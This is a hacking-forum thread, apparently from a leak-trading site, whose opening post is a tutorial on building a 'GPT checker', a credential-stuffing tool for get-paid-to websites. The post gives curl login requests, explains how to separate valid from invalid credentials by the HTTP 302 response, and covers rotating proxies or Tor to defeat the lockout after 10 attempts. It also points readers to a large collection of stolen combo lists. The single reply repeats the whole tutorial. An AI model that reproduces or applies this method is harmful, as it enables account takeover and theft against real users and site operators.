Create an account

Very important

  • To access the important data of the forums, you must be active in each forum and especially in the leaks and database leaks section, send data and after sending the data and activity, data and important content will be opened and visible for you.
  • You will only see chat messages from people who are at or below your level.
  • More than 500,000 database leaks and millions of account leaks are waiting for you, so access and view with more activity.
  • Many important data are inactive and inaccessible for you, so open them with activity. (This will be done automatically)


Thread Rating:
  • 273 Vote(s) - 3.44 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[sunjester tuts] Creating a GPT Checker

#1
[img]https%3A%2F%2Fi.imgur.com%2FxHwJmV0.png[/img]

Introduction
I have been building software for over 20 years. I was building software before there was such a thing as .NET, and hell, there wasn't even PHP yet. Everyone used Perl for backend service and interactivity. Hopefully with my tutorials you will learn some badly needed basic skills. Most of the noobs today don't want anything but free money. Noobs used to aspire to be hackers, now they just aspire to leech. Break the cycle, don't be a moron your whole life, learn a little something, and above all else, keep it simple stupid.

Required Software
All of my tutorials are written on a UNIX based system. You can use Kali linux if you want, almost ANY unix based system should work.
Unix/Linux
Lynx
CURL

Getting Websites
Using Lynx you can get a list of links from just about ANY URL. I love using Lynx for this. Lynx is a command line based browser. I use it (sometimes) daily for a variety of reasons. So let's get a list of links and pick one to attack.

Code
lynx -dump

[To see links please register here]

[Image: ?url=https%3A%2F%2Fi.imgur.com%2FTF0SjNJ.png]

Above you can see the sites in the "hidden links" section, we will just pick one.

Handling Data
The biggest part about making software is simply handling data. If you can't properly handle data, then your software will probably suck ass, but let's go a step further and see if we can't just grab a shit ton of them? Just for giggleshits, or just for use later.

1. Download and save the links to a file named links

Code
lynx -dump

[To see links please register here]

>links

2. Parse the links from file links and save them to a file named links2
Code
grep -Eo '[0-9]{1,4}. http.+?' links >links2

3. Now remove the crap before the links, in the links2 file, the number and period, with the cut command. We will save these results to a file named links3

Code
cat links2 | cut -d' ' -f2

4. We can now sort and remove duplicate links from links3
Code
sort -u links3 -o links3

5. Count how many links are in our links3 file
Code
wc -l links3

6. Make it all into one command and remove the files when we are done.
Code
lynx -dump

[To see links please register here]

>links;grep -Eo '[0-9]{1,4}. http.+?' links >links2;cat links2 | cut -d' ' -f2;sort -u links3 -o links3;rm links links2; cat links3

So there are a lot of links we don't need, but hopefully you learned something about handling data with Unix. Can you do that on a Windows command line with one line of commands? Maybe with wget but I don't know, I don't use Windows. Maybe powershell has something? Who cares?

Logging Into the GPT Site
Logging into the GPT site (we are going to use an easy one for tutorial purposes) is easy with CURL. Below is the login form

[Image: xD2X9Wv.png]

So open the source and find where the form goes.

[Image: 4N9YmRu.png]

So above in the HTML we can see the form uses the POST method to the URL /members/login.php?next. We need to check the rest of the form values, like the value they use for the username and password. This will be sent with the form's POST method to the URL we just mentioned. You will also notice there is another value next that is a hidden element and it's value is 1. The username is named username and the password is named password.

[Image: AwwDKx2.png]

You can also use a Chrome extension so you don't have to do this manually, but you shouldn't always rely on other people's tools, and you should know the basics of how forms work, so it's good practice to look it up yourself. The next thing we need to do is make sure we have a valid account. If we don't have a valid account we won't know what kind of response the server is going to give us when we find a valid account versus an invalid account. So, register a new account.

Code
curl -v --data "next=1&password=password&username=sunjester"

[To see links please register here]


The CURL command above is a valid request with a valid account (user/pass). The results we get from that request and the results we get from a request with an invalid user/pass combo is quite different.

[Image: IrdszRe.png]

An invalid request simply returns a page with HTML on it, with the error message. We don't need to parse the "bad guy" message, as they call it in reverse engineering. Since we already know it will return a 302 Found message, we can use that to determine if we have a valid account with the current user/pass combo. Think CURL has the functionality to return the response header? Yup, it's just a single character, -i so now our request looks like this

A valid request
Code
curl -i --data "next=1&password=password&username=sunjester"

[To see links please register here]

[Image: YaF9SA0.png]

An invalid request

Code
curl -i --data "next=1&password=password1&username=sunjester"

[To see links please register here]

[Image: h8ykpqz.png]

See the response code change? Good. Now let's save the response to a file named account.

Code
curl -i --data "next=1&password=password1&username=sunjester"

[To see links please register here]

>account

We can now use a tool called head which returns the first x amount of lines of a file. In our case, we just need the first line.

Code
head -n1 account

Proxies
Okay, so apparently after testing we can only use the login 10 times before it locks us out.

[Image: XdYbUWG.png]

No worries, we can simply use proxies. It doesn't matter how slow or shitty the proxy is, we can make a script that runs while we sleep, we don't need to monitor it. You could use tor or just get some public proxies online from proxydb.net. It's pretty easy to use a proxy with CURL. Or you can use my proxy scraping project.

Code

[To see links please register here]


Combo Lists
I have a github with more than 17 million, and counting, combo lists.

Code

[To see links please register here]


Conclusion
I wrote this in 37 minutes. I have now given you every piece to the puzzle for creating your own GPT checker. If you can't put one together from what is here in this tutorial, don't worry, you aren't alone. There are people who won't even make it past the first paragraph. Most will turn away when they see they have to use UNIX. Those people are quitters and will NEVER be anything more than a leech to the rest of us. But if you feel that you must leech the script from me, you will have to PM me for the full script.
Reply

#2
Quote:(05-06-2019, 07:58 PM)sunjester Wrote:

[To see links please register here]

[img]https%3A%2F%2Fi.imgur.com%2FxHwJmV0.png[/img]

Introduction
I have been building software for over 20 years. I was building software before there was such a thing as .NET, and hell, there wasn't even PHP yet. Everyone used Perl for backend service and interactivity. Hopefully with my tutorials you will learn some badly needed basic skills. Most of the noobs today don't want anything but free money. Noobs used to aspire to be hackers, now they just aspire to leech. Break the cycle, don't be a moron your whole life, learn a little something, and above all else, keep it simple stupid.

Required Software
All of my tutorials are written on a UNIX based system. You can use Kali linux if you want, almost ANY unix based system should work.
Unix/Linux
Lynx
CURL

Getting Websites
Using Lynx you can get a list of links from just about ANY URL. I love using Lynx for this. Lynx is a command line based browser. I use it (sometimes) daily for a variety of reasons. So let's get a list of links and pick one to attack.

Code
lynx -dump

[To see links please register here]

[Image: ?url=https%3A%2F%2Fi.imgur.com%2FTF0SjNJ.png]

Above you can see the sites in the "hidden links" section, we will just pick one.

Handling Data
The biggest part about making software is simply handling data. If you can't properly handle data, then your software will probably suck ass, but let's go a step further and see if we can't just grab a shit ton of them? Just for giggleshits, or just for use later.

1. Download and save the links to a file named links

Code
lynx -dump

[To see links please register here]

>links

2. Parse the links from file links and save them to a file named links2
Code
grep -Eo '[0-9]{1,4}. http.+?' links >links2

3. Now remove the crap before the links, in the links2 file, the number and period, with the cut command. We will save these results to a file named links3

Code
cat links2 | cut -d' ' -f2

4. We can now sort and remove duplicate links from links3
Code
sort -u links3 -o links3

5. Count how many links are in our links3 file
Code
wc -l links3

6. Make it all into one command and remove the files when we are done.
Code
lynx -dump

[To see links please register here]

>links;grep -Eo '[0-9]{1,4}. http.+?' links >links2;cat links2 | cut -d' ' -f2;sort -u links3 -o links3;rm links links2; cat links3

So there are a lot of links we don't need, but hopefully you learned something about handling data with Unix. Can you do that on a Windows command line with one line of commands? Maybe with wget but I don't know, I don't use Windows. Maybe powershell has something? Who cares?

Logging Into the GPT Site
Logging into the GPT site (we are going to use an easy one for tutorial purposes) is easy with CURL. Below is the login form

[Image: xD2X9Wv.png]

So open the source and find where the form goes.

[Image: 4N9YmRu.png]

So above in the HTML we can see the form uses the POST method to the URL /members/login.php?next. We need to check the rest of the form values, like the value they use for the username and password. This will be sent with the form's POST method to the URL we just mentioned. You will also notice there is another value next that is a hidden element and it's value is 1. The username is named username and the password is named password.

[Image: AwwDKx2.png]

You can also use a Chrome extension so you don't have to do this manually, but you shouldn't always rely on other people's tools, and you should know the basics of how forms work, so it's good practice to look it up yourself. The next thing we need to do is make sure we have a valid account. If we don't have a valid account we won't know what kind of response the server is going to give us when we find a valid account versus an invalid account. So, register a new account.

Code
curl -v --data "next=1&password=password&username=sunjester"

[To see links please register here]


The CURL command above is a valid request with a valid account (user/pass). The results we get from that request and the results we get from a request with an invalid user/pass combo is quite different.

[Image: IrdszRe.png]

An invalid request simply returns a page with HTML on it, with the error message. We don't need to parse the "bad guy" message, as they call it in reverse engineering. Since we already know it will return a 302 Found message, we can use that to determine if we have a valid account with the current user/pass combo. Think CURL has the functionality to return the response header? Yup, it's just a single character, -i so now our request looks like this

A valid request
Code
curl -i --data "next=1&password=password&username=sunjester"

[To see links please register here]

[Image: YaF9SA0.png]

An invalid request

Code
curl -i --data "next=1&password=password1&username=sunjester"

[To see links please register here]

[Image: h8ykpqz.png]

See the response code change? Good. Now let's save the response to a file named account.

Code
curl -i --data "next=1&password=password1&username=sunjester"

[To see links please register here]

>account

We can now use a tool called head which returns the first x amount of lines of a file. In our case, we just need the first line.

Code
head -n1 account

Proxies
Okay, so apparently after testing we can only use the login 10 times before it locks us out.

[Image: XdYbUWG.png]

No worries, we can simply use proxies. It doesn't matter how slow or shitty the proxy is, we can make a script that runs while we sleep, we don't need to monitor it. You could use tor or just get some public proxies online from proxydb.net. It's pretty easy to use a proxy with CURL. Or you can use my proxy scraping project.

Code

[To see links please register here]


Combo Lists
I have a github with more than 17 million, and counting, combo lists.

Code

[To see links please register here]


Conclusion
I wrote this in 37 minutes. I have now given you every piece to the puzzle for creating your own GPT checker. If you can't put one together from what is here in this tutorial, don't worry, you aren't alone. There are people who won't even make it past the first paragraph. Most will turn away when they see they have to use UNIX. Those people are quitters and will NEVER be anything more than a leech to the rest of us. But if you feel that you must leech the script from me, you will have to PM me for the full script.

great sharing of your github. I also like your Rat Museum section.
Reply



Forum Jump:


Users browsing this thread:
1 Guest(s)

©0Day  2016 - 2023 | All Rights Reserved.  Made with    for the community. Connected through